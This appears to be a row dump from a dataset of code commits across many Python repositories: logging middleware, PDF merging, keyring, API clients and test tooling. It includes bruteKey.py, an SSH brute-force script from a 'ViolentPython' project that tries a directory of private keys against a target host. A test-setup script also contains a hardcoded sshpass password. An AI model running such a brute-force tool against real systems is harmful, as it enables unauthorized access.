commit
stringlengths 40
40
| subject
stringlengths 4
1.73k
| repos
stringlengths 5
127k
| old_file
stringlengths 2
751
| new_file
stringlengths 2
751
| new_contents
stringlengths 1
8.98k
| old_contents
stringlengths 0
6.59k
| license
stringclasses 13
values | lang
stringclasses 23
values |
---|---|---|---|---|---|---|---|---|
411751a10ece8b84bb122422b8d58f22710731aa | Fix typo | wizeline/relayer | relayer/flask/logging_middleware.py | relayer/flask/logging_middleware.py | from datetime import datetime
class LoggingMiddleware(object):
def __init__(self, app, wsgi_app, context, logging_topic):
self.app = app
self.wsgi_app = wsgi_app
self.context = context
self.logging_topic = logging_topic
def __call__(self, environ, start_response):
with self.app.app_context():
start_time = datetime.utcnow()
status_code = None
content_length = None
self.context.start_request()
def logging_start_response(status, response_headers, exc_info=None):
nonlocal status_code, content_length
status_code = int(status.partition(' ')[0])
for name, value in response_headers:
if name.lower() == 'content-length':
content_length = int(value)
break
return start_response(status, response_headers, exc_info)
response = self.wsgi_app(environ, logging_start_response)
if content_length is None:
content_length = len(b''.join(response))
elapsed_time = datetime.utcnow() - start_time
elapsed_time_milliseconds = elapsed_time.microseconds / 1000.0 + elapsed_time.seconds * 1000
request_log = {
'date': start_time.isoformat(),
'user_agent': environ.get('HTTP_USER_AGENT'),
'method': environ.get('REQUEST_METHOD'),
'path': environ.get('PATH_INFO'),
'query_string': environ.get('QUERY_STRING'),
'remote_addr': environ.get('X_REAL_IP', environ.get('REMOTE_ADDR')),
'x_forwarded_for': environ.get('X_FORWARDED_FOR'),
'status': status_code,
'content_length': content_length,
'request_time': elapsed_time_milliseconds
}
self.context.end_request(self.logging_topic, request_log)
return response
| from datetime import datetime
class LoggingMiddleware(object):
def __init__(self, app, wsgi_app, context, logging_topic):
self.app = app
self.wsgi_app = wsgi_app
self.context = context
self.logging_topic = logging_topic
def __call__(self, environ, start_response):
with self.app.app_context():
start_time = datetime.utcnow()
status_code = None
content_length = None
self.context.start_request()
def logging_start_response(status, response_headers, exc_info=None):
nonlocal status_code, content_length
status_code = int(status.partition(' ')[0])
for name, value in response_headers:
if name.lower() == 'content-length':
content_length = int(value)
break
return start_response(status, response_headers, exc_info)
response = self.wsgi_app(environ, logging_start_response)
if content_length is None:
content_length = len(b''.join(response))
elapsed_time = datetime.utcnow() - start_time
elapsed_time_milliseconds = elapsed_time.microseconds / 1000.0 + elapsed_time.seconds * 1000
request_log = {
'date': start_time.isoformat(),
'user_agent': environ.get('HTTP_USER_AGENT'),
'method': environ.get('REQUEST_METHOD'),
'path': environ.get('PATH_INFO'),
'query_string': environ.get('QUERY_STRING'),
'remote_addr': environ.get('X_REAL_IP', environ.get('REMOTE_ADDR')),
'x_forwarded_for': environ.get('X_Forwarded_For'),
'status': status_code,
'content_length': content_length,
'request_time': elapsed_time_milliseconds
}
self.context.end_request(self.logging_topic, request_log)
return response
| mit | Python |
911e961f189967554bc5a046f022bb1c394cc119 | Debug and test before finishing. p50-52 | n1cfury/ViolentPython | bruteKey.py | bruteKey.py | #!/usr/bin/env python
import pexpect, optparse, os
from threading import *
maxConnections = 5
connection_lock = BoundSemapohre(value=maxConnections)
Stop = False
Fails = 0
usage = "Example: bruteKey.py -H <target> -u <user name> -d <directory> "
def banner():
print "##### SSH Weak Key Exploit #######"
usage
print""
def connect(user, host, keyfile, release):
global Stop
global Fails
try:
perm_denied = 'Permission denied'
ssh_newkey = 'Are you sure you wan tto continue'
conn_closed = 'Connection closed by remote host'
opt = ' -o PasswordAuthentication=no'
connStr = 'ssh '+user+'@'+host+' -i'+keyfile+opt
child = pexpect.spawn(connStr)
ret = child.expect([pexpect.TIMEOUT, perm_denied, ssh_newkey, conn_closed, '$', '#', ])
if ret == 2:
print '[-] Adding Host to ~/.ssh/known_hosts'
child.sendline('yes')
connect(user, host, keyfile, False)
elif ret == 3:
print '[-] Connection Closed By Remote Host'
Fails += 1
elif ret > 3:
print '[+] Success. '+str(keyfile)
Stop = True
finally:
if release:
connection_lock.release()
def main():
parser = optparse.OptionParser('usage%prog -H '+'target host -u <user> -d <directory>')
parser.add_option('-H', dest='tgtHost', type='string', help='specify target host')
parser.add_option('-d', dest='passDir', type='string', help='specify directory with keys')
parser.add_option('u', dest=user, type='string', help='specify the user')
(options, args) = parser.parse_args()
host = options.tgtHost
passDir = options.passDir
user =options.user
if host == None or passDir == None or user == None:
print parser.usage
exit(0)
for filename in os.listdir(passDir):
if Stop:
print '[*] Exiting: Key Found.'
exit(0)
if Fails > 5:
print '[!] Exiting: '+'Too Many Connections Closed by Remote Host.'
print '[!] Adjust number of simultaneous threads.'
exit(0)
connection_lock.acquire()
fullpath = os.path.join(passDir, filename)
print '[-] Testing Keyfile '+str(fullpath)
t = Thread(target=connect, args =(user, host, fullpath, True))
child = t.start()
if __name__ == '__main__':
main() | #!/usr/bin/env python
import pexpect, optparse, os
from threading import *
maxConnections = 5
connection_lock = BoundSemapohre(value=maxConnections)
Stop = False
Fails = 0
usage = "Example: bruteKey.py -H <target> -u <user name> -d <directory> "
def banner():
print "##### SSH Weak Key Exploit #######"
usage
print""
def connect(user, host, keyfile, release):
global Stop
global Fails
try:
perm_denied = 'Permission denied'
ssh_newkey = 'Are you sure you wan tto continue'
conn_closed = 'Connection closed by remote host'
opt = ' -o PasswordAuthentication=no'
connStr = 'ssh '+user+'@'+host+' -i'+keyfile+opt
child = pexpect.spawn(connStr)
ret = child.expect([pexpect.TIMEOUT, perm_denied, ssh_newkey, conn_closed, '$', '#', ])
if ret == 2:
print '[-] Adding Host to ~/.ssh/known_hosts'
child.sendline('yes')
connect(user, host, keyfile, False)
elif ret == 3:
print '[-] Connection Closed By Remote Host'
Fails += 1
elif ret > 3:
print '[+] Success. '+str(keyfile)
Stop = True
finally:
if release:
connection_lock.release()
def main():
parser = optparse.OptionParser('usage%prog -H '+'target host -u <user> -d <directory>')
parser.
if __name__ == '__main__':
main() | mit | Python |
f3578096219dbb82572063c8a6dbb75be4da07ac | Update P03_combinePDFs fixed reading encrypted files | JoseALermaIII/python-tutorials,JoseALermaIII/python-tutorials | books/AutomateTheBoringStuffWithPython/Chapter13/P03_combinePDFs.py | books/AutomateTheBoringStuffWithPython/Chapter13/P03_combinePDFs.py | #! python3
# combinePdfs.py - Combines all the PDFs in the current working directory into
# a single PDF.
import PyPDF4, os
# Get all the PDF filenames.
pdfFiles = []
for filename in os.listdir('.'):
if filename.endswith(".pdf"):
pdfFiles.append(filename)
pdfFiles.sort(key=str.lower)
pdfWriter = PyPDF4.PdfFileWriter()
# Loop through all the PDF files.
for filename in pdfFiles:
pdfFileObj = open(filename, "rb")
pdfReader = PyPDF4.PdfFileReader(pdfFileObj)
if pdfReader.isEncrypted and filename == "encrypted.pdf":
pdfReader.decrypt("rosebud")
if pdfReader.isEncrypted and filename == "encryptedminutes.pdf":
pdfReader.decrypt("swordfish")
# Loop through all the pages (except the first) and add them.
for pageNum in range(1, pdfReader.numPages):
pageObj = pdfReader.getPage(pageNum)
pdfWriter.addPage(pageObj)
# Save the resulting PDF to a file.
pdfOutput = open("allminutes.pdf", "wb")
pdfWriter.write(pdfOutput)
pdfOutput.close()
| #! python3
# combinePdfs.py - Combines all the PDFs in the current working directory into
# a single PDF.
import PyPDF4, os
# Get all the PDF filenames.
pdfFiles = []
for filename in os.listdir('.'):
if filename.endswith(".pdf"):
pdfFiles.append(filename)
pdfFiles.sort(key=str.lower)
pdfWriter = PyPDF4.PdfFileWriter()
# Loop through all the PDF files.
for filename in pdfFiles:
pdfFileObj = open(filename, "rb")
pdfReader = PyPDF4.PdfFileReader(pdfFileObj)
# Loop through all the pages (except the first) and add them.
for pageNum in range(1, pdfReader.numPages):
pageObj = pdfReader.getPage(pageNum)
pdfWriter.addPage(pageObj)
# Save the resulting PDF to a file.
pdfOutput = open("allminutes.pdf", "wb")
pdfWriter.write(pdfOutput)
pdfOutput.close()
| mit | Python |
26ce46c14f3fc5d38253617822974c21b488dd95 | Set priority to 0, set viability to permanently null. Add test to ensure keyring can render itself. Ref #358. | jaraco/keyring | keyring/backends/chainer.py | keyring/backends/chainer.py | """
Implementation of a keyring backend chainer.
This is specifically not a viable backend, and must be
instantiated directly with a list of ordered backends.
"""
from __future__ import absolute_import
from ..backend import KeyringBackend
class ChainerBackend(KeyringBackend):
"""
>>> ChainerBackend(())
<keyring.backends.chainer.ChainerBackend object at ...>
"""
priority = 0
viable = False
def __init__(self, backends):
self.backends = list(backends)
def get_password(self, service, username):
for backend in self.backends:
password = backend.get_password(service, username)
if password is not None:
return password
def set_password(self, service, username, password):
for backend in self.backends:
try:
return backend.set_password(service, username, password)
except NotImplementedError:
pass
def delete_password(self, service, username):
for backend in self.backends:
try:
return backend.delete_password(service, username)
except NotImplementedError:
pass
def get_credential(self, service, username):
for backend in self.backends:
credential = backend.get_credential(service, username)
if credential is not None:
return credential
| """
Implementation of a keyring backend chainer.
This is specifically not a viable backend, and must be
instantiated directly with a list of ordered backends.
"""
from __future__ import absolute_import
from ..backend import KeyringBackend
class ChainerBackend(KeyringBackend):
def __init__(self, backends):
self.backends = list(backends)
def get_password(self, service, username):
for backend in self.backends:
password = backend.get_password(service, username)
if password is not None:
return password
def set_password(self, service, username, password):
for backend in self.backends:
try:
return backend.set_password(service, username, password)
except NotImplementedError:
pass
def delete_password(self, service, username):
for backend in self.backends:
try:
return backend.delete_password(service, username)
except NotImplementedError:
pass
def get_credential(self, service, username):
for backend in self.backends:
credential = backend.get_credential(service, username)
if credential is not None:
return credential
| mit | Python |
56598776ce6588445cf0d76b5faaea507d5d1405 | Update Labels for consistency | sigmavirus24/github3.py | github3/issues/label.py | github3/issues/label.py | # -*- coding: utf-8 -*-
"""Module containing the logic for labels."""
from __future__ import unicode_literals
from json import dumps
from ..decorators import requires_auth
from ..models import GitHubCore
class Label(GitHubCore):
"""A representation of a label object defined on a repository.
See also: http://developer.github.com/v3/issues/labels/
This object has the following attributes::
.. attribute:: color
The hexadecimeal representation of the background color of this label.
.. attribute:: name
The name (display label) for this label.
"""
def _update_attributes(self, label):
self._api = label['url']
self.color = label['color']
self.name = label['name']
self._uniq = self._api
def _repr(self):
return '<Label [{0}]>'.format(self)
def __str__(self):
return self.name
@requires_auth
def delete(self):
"""Delete this label.
:returns:
True if successfully deleted, False otherwise
:rtype:
bool
"""
return self._boolean(self._delete(self._api), 204, 404)
@requires_auth
def update(self, name, color):
"""Update this label.
:param str name:
(required), new name of the label
:param str color:
(required), color code, e.g., 626262, no leading '#'
:returns:
True if successfully updated, False otherwise
:rtype:
bool
"""
json = None
if name and color:
if color[0] == '#':
color = color[1:]
json = self._json(self._patch(self._api, data=dumps({
'name': name, 'color': color})), 200)
if json:
self._update_attributes(json)
return True
return False
| # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from json import dumps
from ..decorators import requires_auth
from ..models import GitHubCore
class Label(GitHubCore):
"""The :class:`Label <Label>` object. Succintly represents a label that
exists in a repository.
See also: http://developer.github.com/v3/issues/labels/
"""
def _update_attributes(self, label):
self._api = self._get_attribute(label, 'url')
#: Color of the label, e.g., 626262
self.color = self._get_attribute(label, 'color')
#: Name of the label, e.g., 'bug'
self.name = self._get_attribute(label, 'name')
self._uniq = self._api
def _repr(self):
return '<Label [{0}]>'.format(self)
def __str__(self):
return self.name
@requires_auth
def delete(self):
"""Delete this label.
:returns: bool
"""
return self._boolean(self._delete(self._api), 204, 404)
@requires_auth
def update(self, name, color):
"""Update this label.
:param str name: (required), new name of the label
:param str color: (required), color code, e.g., 626262, no leading '#'
:returns: bool
"""
json = None
if name and color:
if color[0] == '#':
color = color[1:]
json = self._json(self._patch(self._api, data=dumps({
'name': name, 'color': color})), 200)
if json:
self._update_attributes(json)
return True
return False
| bsd-3-clause | Python |
9626736dc94c85987472b7d7ad5951363883a5dc | Disable Facter plugin if yaml import fails | pombredanne/jsonstats,RHInception/jsonstats,RHInception/jsonstats,pombredanne/jsonstats | JsonStats/FetchStats/Plugins/Facter.py | JsonStats/FetchStats/Plugins/Facter.py | import datetime
from JsonStats.FetchStats import Fetcher
import os.path
class Facter(Fetcher):
"""
Facter plugin for `jsonstats`. Returns key-value pairs of general
system information provided by the `facter` command.
Load conditions:
* Plugin will load if the `facter` command is found
Operating behavior:
* Plugin will call `facter` with the `-p` (return `puppet` facts)
option if the `puppet` command is on the system.
Dependencies:
* Facter - http://puppetlabs.com/blog/facter-part-1-facter-101
* PyYAML - http://pyyaml.org/wiki/PyYAML
Optional dependencies:
* Puppet - http://puppetlabs.com/puppet/what-is-puppet
"""
try:
import yaml
except ImportError:
yaml = None
def __init__(self):
self.context = 'facter'
self._cmd = 'facter --yaml 2>/dev/null'
if self.yaml is None:
self._loaded(False, msg='No module named yaml')
return
if os.path.exists('/usr/bin/puppet'):
self._cmd = 'facter -p --yaml 2>/dev/null'
self._load_data()
def _load_data(self):
self._refresh_time = datetime.datetime.utcnow()
try:
output = self._exec(self._cmd)
self.facts = self.yaml.load(output)
self._loaded(True)
except OSError, e:
# Couldn't find facter command, most likely
self._loaded(False, msg=str(e))
except Exception, e:
# Something else did indeed go wrong
self._loaded(False, msg=str(e))
def dump(self):
# poor mans cache, refresh cache in an hour
if (datetime.datetime.utcnow() -
datetime.timedelta(minutes=5)) > self._refresh_time:
self._load_data()
return self.facts
def dump_json(self):
return self.json.dumps(self.dump())
| import datetime
from JsonStats.FetchStats import Fetcher
import os.path
class Facter(Fetcher):
"""
Facter plugin for `jsonstats`. Returns key-value pairs of general
system information provided by the `facter` command.
Load conditions:
* Plugin will load if the `facter` command is found
Operating behavior:
* Plugin will call `facter` with the `-p` (return `puppet` facts)
option if the `puppet` command is on the system.
Dependencies:
* Facter - http://puppetlabs.com/blog/facter-part-1-facter-101
Optional dependencies:
* Puppet - http://puppetlabs.com/puppet/what-is-puppet
"""
import yaml
def __init__(self):
self.context = 'facter'
self._cmd = 'facter --yaml 2>/dev/null'
if os.path.exists('/usr/bin/puppet'):
self._cmd = 'facter -p --yaml 2>/dev/null'
self._load_data()
def _load_data(self):
self._refresh_time = datetime.datetime.utcnow()
try:
output = self._exec(self._cmd)
self.facts = self.yaml.load(output)
self._loaded(True)
except OSError, e:
# Couldn't find facter command, most likely
self._loaded(False, msg=str(e))
except Exception, e:
# Something else did indeed go wrong
self._loaded(False, msg=str(e))
def dump(self):
# poor mans cache, refresh cache in an hour
if (datetime.datetime.utcnow() -
datetime.timedelta(minutes=5)) > self._refresh_time:
self._load_data()
return self.facts
def dump_json(self):
return self.json.dumps(self.dump())
| mit | Python |
764f785bfa34d99dc2633db78a0d80407e401993 | Implement a client instance | liberation/zuora-client | zuora/client.py | zuora/client.py | """
Client for Zuora SOAP API
"""
# TODO:
# - Handle debug
# - Handle error
# - Session policy
from suds.client import Client
from suds.sax.element import Element
from zuora.transport import HttpTransportWithKeepAlive
class ZuoraException(Exception):
"""
Base Zuora Exception.
"""
pass
class Zuora(object):
"""
SOAP Client based on Suds
"""
def __init__(self, wsdl, login, password):
self.wsdl = wsdl
self.login = login
self.password = password
self.session = None
self.wsdl_path = 'file://%s' % os.path.abspath(self.wsdl)
self.client = Client(
self.wsdl_path,
transport=HttpTransportWithKeepAlive())
def __str__(self):
return self.client.__str__()
| """
Client for Zuora SOAP API
"""
# TODO:
# - Handle debug
# - Handle error
# - Session policy
from suds.client import Client
from suds.sax.element import Element
class ZuoraException(Exception):
"""
Base Zuora Exception.
"""
pass
class Zuora(object):
"""
SOAP Client based on Suds
"""
def __init__(self, wsdl, login, password):
self.wsdl = wsdl
self.login = login
self.password = password
| bsd-3-clause | Python |
88206513d4a04a99832ac8461a3209b2d1d7d2c8 | make test work | mkuiack/tkp,transientskp/tkp,mkuiack/tkp,bartscheers/tkp,bartscheers/tkp,transientskp/tkp | tests/test_quality/test_restoringbeam.py | tests/test_quality/test_restoringbeam.py | import os
import unittest2 as unittest
from tkp.quality.restoringbeam import beam_invalid
from tkp.testutil.decorators import requires_data
from tkp import accessors
from tkp.testutil.data import DATAPATH
fits_file = os.path.join(DATAPATH,
'quality/noise/bad/home-pcarrol-msss-3C196a-analysis-band6.corr.fits')
@requires_data(fits_file)
class TestRestoringBeam(unittest.TestCase):
def test_header(self):
image = accessors.open(fits_file)
(semimaj, semimin, theta) = image.beam
self.assertFalse(beam_invalid(semimaj, semimin, theta))
# TODO: this is for FOV calculation and checking
#data = tkp.quality.restoringbeam.parse_fits(image)
#frequency = image.freq_eff
#wavelength = scipy.constants.c/frequency
#d = 32.25
#fwhm = tkp.lofar.beam.fwhm(wavelength, d)
#fov = tkp.lofar.beam.fov(fwhm)
def test_infinite(self):
smaj, smin, theta = float('inf'), float('inf'), float('inf')
self.assertTrue(beam_invalid(smaj, smin, theta))
if __name__ == '__main__':
unittest.main()
| import os
import unittest2 as unittest
from tkp.quality.restoringbeam import beam_invalid
from tkp.testutil.decorators import requires_data
from tkp import accessors
from tkp.testutil.data import DATAPATH
fits_file = os.path.join(DATAPATH,
'quality/noise/bad/home-pcarrol-msss-3C196a-analysis-band6.corr.fits')
@requires_data(fits_file)
class TestRestoringBeam(unittest.TestCase):
def test_header(self):
image = accessors.open(fits_file)
(semimaj, semimin, theta) = image.beam
self.assertFalse(beam_invalid(semimaj, semimin))
# TODO: this is for FOV calculation and checking
#data = tkp.quality.restoringbeam.parse_fits(image)
#frequency = image.freq_eff
#wavelength = scipy.constants.c/frequency
#d = 32.25
#fwhm = tkp.lofar.beam.fwhm(wavelength, d)
#fov = tkp.lofar.beam.fov(fwhm)
def test_infinite(self):
smaj, smin, theta = float('inf'), float('inf'), float('inf')
self.assertTrue(beam_invalid(smaj, smin, theta))
if __name__ == '__main__':
unittest.main()
| bsd-2-clause | Python |
716ffae543838af6de7b83723ac6048a9f8f390a | improve test list latest articles | eliostvs/django-kb,eliostvs/django-kb | knowledge/tests/tests_views.py | knowledge/tests/tests_views.py | from __future__ import unicode_literals
from model_mommy import mommy
from knowledge.base import choices
from knowledge.base.test import ViewTestCase
from knowledge.models import Article
class HomepageTestCase(ViewTestCase):
from knowledge.views import Homepage
view_class = Homepage
view_name = 'knowledge:homepage'
def setUp(self):
self.category = mommy.make_recipe('knowledge.tests.category_with_articles')
mommy.make_recipe('knowledge.tests.category_without_articles')
for article in Article.objects.published():
article.votes.add(token=article.id, rate=choices.VoteChoice.Upvote)
def test_category_list(self):
response = self.get()
self.assertHttpOK(response)
self.assertSeqEqual(response.context_data['category_list'], [self.category])
def test_have_a_search_form_on_context(self):
from knowledge.forms import SimpleSearchForm
response = self.get()
self.assertEqual(response.context_data['search_form'], SimpleSearchForm)
def test_list_latest_articles(self):
articles = mommy.make_recipe('knowledge.tests.published_article',
category=self.category,
_quantity=5)
response = self.get()
self.assertHttpOK(response)
self.assertEqual(Article.objects.count(), 7)
self.assertSeqEqual(response.context_data['new_articles'], articles)
def test_list_top_viewed_articles(self):
response = self.get()
self.assertHttpOK(response)
self.assertSeqEqual(response.context_data['new_articles'], Article.objects.published())
def test_list_top_rated_articles(self):
response = self.get()
self.assertHttpOK(response)
self.assertSeqEqual(response.context_data['top_viewed_articles'], Article.objects.published())
| from __future__ import unicode_literals
from model_mommy import mommy
from knowledge.base import choices
from knowledge.base.test import ViewTestCase
from knowledge.models import Article
class HomepageTestCase(ViewTestCase):
from knowledge.views import Homepage
view_class = Homepage
view_name = 'knowledge:homepage'
def setUp(self):
self.category = mommy.make_recipe('knowledge.tests.category_with_articles')
mommy.make_recipe('knowledge.tests.category_without_articles')
for article in Article.objects.published():
article.votes.add(token=article.id, rate=choices.VoteChoice.Upvote)
def test_category_list(self):
response = self.get()
self.assertHttpOK(response)
self.assertSeqEqual(response.context_data['category_list'], [self.category])
def test_have_a_search_form_on_context(self):
from knowledge.forms import SimpleSearchForm
response = self.get()
self.assertEqual(response.context_data['search_form'], SimpleSearchForm)
def test_count_published_articles(self):
response = self.get()
category_list = response.context_data['category_list']
self.assertHttpOK(response)
self.assertEqual(category_list[0].get_articles_count(), 1)
def test_list_latest_published_articles(self):
response = self.get()
self.assertHttpOK(response)
self.assertSeqEqual(response.context_data['new_articles'], Article.objects.published())
def test_list_top_viewed_published_articles(self):
response = self.get()
self.assertHttpOK(response)
self.assertSeqEqual(response.context_data['new_articles'], Article.objects.published())
def test_list_top_rated_published_articles(self):
response = self.get()
self.assertHttpOK(response)
self.assertSeqEqual(response.context_data['top_viewed_articles'], Article.objects.published())
| bsd-3-clause | Python |
c69ac39ee650445533d31a4a476f6f3b14cb43ca | Update roles.py | mikelambson/tcid,mikelambson/tcid,mikelambson/tcid,mikelambson/tcid | site/models/roles.py | site/models/roles.py | import datetime, re;
from sqlalchemy.orm import validates;
from server import DB, FlaskServer;
class Roles(DB.Model):
id = DB.Column(DB.Integer, primary_key=True, autoincrement=True);
name = DB.Column(DB.String(20);
district_id = DB.relationship(DB.Integer, DB.ForeignKey('district.id'));
created_by = DB.relationship(DB.Integer, DB.ForeignKey('users.id'));
created_at = DB.Column(DB.DateTime);
updated_by = DB.relationship(DB.Integer, DB.ForeignKey('users.id'));
updated_at = DB.Column(DB.DateTime, nullable=True);
def __init__(self, name, created_at, updated_at):
self.name = name;
self.created_at = datetime.datetime.now();
self.updated_at = self.created_at;
| import datetime, re;
from sqlalchemy.orm import validates;
from server import DB, FlaskServer;
class Roles(DB.Model):
id = DB.Column(DB.Integer, primary_key=True, autoincrement=True);
name = DB.Column(DB.String(20);
district_id = DB.relationship(DB.Integer, DB.ForeignKey('district.id'));
created_by = DB.relationship(DB.Integer, DB.ForeignKey('users.id'));
created_at = DB.Column(DB.DateTime);
updated_by = DB.relationship(DB.Integer, DB.ForeignKey('users.id'), nullable=True);
updated_at = DB.Column(DB.DateTime, nullable=True);
def __init__(self, name, created_at, updated_at):
self.name = name;
self.created_at = datetime.datetime.now();
self.updated_at = self.created_at;
| bsd-3-clause | Python |
ea542282911cbc7b3cf594a20175fbddcbd75a89 | Use absolute import | mxreppy/restapi-logging-handler,narwhaljames/restapi-logging-handler | restapi_logging_handler/__init__.py | restapi_logging_handler/__init__.py | from __future__ import absolute_import
from restapi_logging_handler.loggly_handler import LogglyHandler
from restapi_logging_handler.restapi_logging_handler import RestApiHandler
| from loggly_handler import LogglyHandler
from restapi_logging_handler import RestApiHandler
| mit | Python |
128c54529da80d5f84a0bf8a9bca6e83ed14a342 | Delete unused import | thombashi/SimpleSQLite,thombashi/SimpleSQLite | simplesqlite/loader/html/formatter.py | simplesqlite/loader/html/formatter.py | # encoding: utf-8
"""
.. codeauthor:: Tsuyoshi Hombashi <[email protected]>
"""
from __future__ import absolute_import
import bs4
import dataproperty
from ..constant import TableNameTemplate as tnt
from ..data import TableData
from ..formatter import TableFormatter
class HtmlTableFormatter(TableFormatter):
def __init__(self, source_data):
super(HtmlTableFormatter, self).__init__(source_data)
try:
self.__soup = bs4.BeautifulSoup(self._source_data, "lxml")
except bs4.FeatureNotFound:
self.__soup = bs4.BeautifulSoup(self._source_data, "html.parser")
def to_table_data(self):
self._validate_source_data()
for table in self.__soup.find_all("table"):
tabledata = self.__parse_html(table)
yield tabledata
def _make_table_name(self):
table_name = self._loader.make_table_name()
key = self.__table_id
if dataproperty.is_empty_string(key):
key = "{:s}{:d}".format(
self._loader.format_name,
self._loader.get_format_table_count())
return table_name.replace(tnt.KEY, key)
def __parse_html(self, table):
header_list = []
data_matrix = []
self.__table_id = table.get("id")
row_list = table.find_all("tr")
for row in row_list:
col_list = row.find_all("td")
if dataproperty.is_empty_sequence(col_list):
th_list = row.find_all("th")
if dataproperty.is_empty_sequence(th_list):
continue
header_list = [row.text.strip() for row in th_list]
continue
data_list = [value.text.strip() for value in col_list]
data_matrix.append(data_list)
self._loader.inc_table_count()
return TableData(
self._make_table_name(), header_list, data_matrix)
| # encoding: utf-8
"""
.. codeauthor:: Tsuyoshi Hombashi <[email protected]>
"""
from __future__ import absolute_import
import bs4
import dataproperty
from ..constant import TableNameTemplate as tnt
from ..data import TableData
from ..error import InvalidDataError
from ..formatter import TableFormatter
class HtmlTableFormatter(TableFormatter):
def __init__(self, source_data):
super(HtmlTableFormatter, self).__init__(source_data)
try:
self.__soup = bs4.BeautifulSoup(self._source_data, "lxml")
except bs4.FeatureNotFound:
self.__soup = bs4.BeautifulSoup(self._source_data, "html.parser")
def to_table_data(self):
self._validate_source_data()
for table in self.__soup.find_all("table"):
tabledata = self.__parse_html(table)
yield tabledata
def _make_table_name(self):
table_name = self._loader.make_table_name()
key = self.__table_id
if dataproperty.is_empty_string(key):
key = "{:s}{:d}".format(
self._loader.format_name,
self._loader.get_format_table_count())
return table_name.replace(tnt.KEY, key)
def __parse_html(self, table):
header_list = []
data_matrix = []
self.__table_id = table.get("id")
row_list = table.find_all("tr")
for row in row_list:
col_list = row.find_all("td")
if dataproperty.is_empty_sequence(col_list):
th_list = row.find_all("th")
if dataproperty.is_empty_sequence(th_list):
continue
header_list = [row.text.strip() for row in th_list]
continue
data_list = [value.text.strip() for value in col_list]
data_matrix.append(data_list)
self._loader.inc_table_count()
return TableData(
self._make_table_name(), header_list, data_matrix)
| mit | Python |
7f02d1f2b23bbf27e99d87ef23c491823875c3d1 | fix bin none subprocess.TimeoutExpired | le9i0nx/ansible-role-test | bin/virt.py | bin/virt.py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
import yaml
import subprocess
import os
import sys
def proc(cmd,time = 120,sh = True ):
print("$".format(cmd))
p = subprocess.Popen(cmd,stdout=subprocess.PIPE,stderr=subprocess.PIPE, shell=sh)
outs, errs = p.communicate(timeout=time)
return outs,errs,p
ROOT_PATH=os.path.dirname(__file__)
print(proc("sudo apt-get update")[0])
print(proc("sudo apt-get install -qq sshpass")[0])
print(proc("ssh-keygen -b 2048 -t rsa -f $HOME/.ssh/id_rsa -q -N \"\"")[0])
print(proc("docker info")[0])
print(proc("docker version")[0])
with open('meta/main.yml', 'r') as f:
doc = yaml.load(f)
for i in doc["galaxy_info"]["platforms"]:
distrib = i["name"]
for x in i["versions"]:
dockerfile = "{}/../dockerfile/{}/{}/Dockerfile".format(ROOT_PATH,distrib,x)
if os.path.exists(dockerfile):
print(proc("docker build -f {} -t {}_{} .".format(dockerfile,distrib,x))[0])
print(proc("docker run -d --cap-add=SYS_ADMIN -it -v /sys/fs/cgroup:/sys/fs/cgroup:ro {}_{}".format(distrib,x))[0])
else:
print("Critical error. Not found docker files {}".format(dockerfile))
sys.exit(1)
proc("sleep 10")
proc("docker inspect --format '{{.Config.Image}} ansible_ssh_host={{.NetworkSettings.IPAddress}}' `docker ps -q` >> /etc/ansible/hosts")
for item in proc("docker inspect --format '{{ .NetworkSettings.IPAddress }}' \`docker ps -q\`")[0]:
proc("ssh-keyscan -H {} >> ~/.ssh/known_hosts".format(item))
proc("sshpass -p '000000' ssh-copy-id root@{}".format(item))
| #!/usr/bin/env python
# -*- coding: utf-8 -*-
import yaml
import subprocess
import os
import sys
def proc(cmd,time = 120,sh = True ):
print("$".format(cmd))
p = subprocess.Popen(cmd,stdout=subprocess.PIPE,stderr=subprocess.PIPE, shell=sh)
try:
outs, errs = p.communicate(timeout=time)
except subprocess.TimeoutExpired:
p.kill()
outs, errs = p.communicate()
return outs,errs,p
ROOT_PATH=os.path.dirname(__file__)
print(proc("sudo apt-get update")[0])
print(proc("sudo apt-get install -qq sshpass")[0])
print(proc("ssh-keygen -b 2048 -t rsa -f $HOME/.ssh/id_rsa -q -N \"\"")[0])
print(proc("docker info")[0])
print(proc("docker version")[0])
with open('meta/main.yml', 'r') as f:
doc = yaml.load(f)
for i in doc["galaxy_info"]["platforms"]:
distrib = i["name"]
for x in i["versions"]:
dockerfile = "{}/../dockerfile/{}/{}/Dockerfile".format(ROOT_PATH,distrib,x)
if os.path.exists(dockerfile):
print(proc("docker build -f {} -t {}_{} .".format(dockerfile,distrib,x))[0])
print(proc("docker run -d --cap-add=SYS_ADMIN -it -v /sys/fs/cgroup:/sys/fs/cgroup:ro {}_{}".format(distrib,x))[0])
else:
print("Critical error. Not found docker files {}".format(dockerfile))
sys.exit(1)
proc("sleep 10")
proc("docker inspect --format '{{.Config.Image}} ansible_ssh_host={{.NetworkSettings.IPAddress}}' `docker ps -q` >> /etc/ansible/hosts")
for item in proc("docker inspect --format '{{ .NetworkSettings.IPAddress }}' \`docker ps -q\`")[0]:
proc("ssh-keyscan -H {} >> ~/.ssh/known_hosts".format(item))
proc("sshpass -p '000000' ssh-copy-id root@{}".format(item))
| mit | Python |
45e9ddce96b4fdadca63a50bf2808c7f98520d99 | print query on error | isb-cgc/ISB-CGC-data-proc,isb-cgc/ISB-CGC-data-proc,isb-cgc/ISB-CGC-data-proc | data_upload/util/bq_wrapper.py | data_upload/util/bq_wrapper.py | '''
Created on Jan 22, 2017
Copyright 2017, Institute for Systems Biology.
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
@author: michael
'''
from google.cloud import bigquery
def query_bq_table(query, use_legacy, project, log):
log.info('\t\tquerying bq: %s' % query)
client = bigquery.Client(project=project)
query_results = client.run_sync_query(query)
# Use standard SQL syntax for queries.
# See: https://cloud.google.com/bigquery/sql-reference/
query_results.use_legacy_sql = use_legacy
try:
query_results.run()
except:
log.exception('problem with query:\n{}'.format(query))
raise
log.info('\t\tdone querying bq: %s' % query)
return query_results
def fetch_paged_results(query_results, fetch_count, project_name, page_token, log):
log.info('\t\trequesting %d rows %s' % (fetch_count, (' for ' + project_name) if project_name else ''))
rows, total_rows, page_token = query_results.fetch_data(
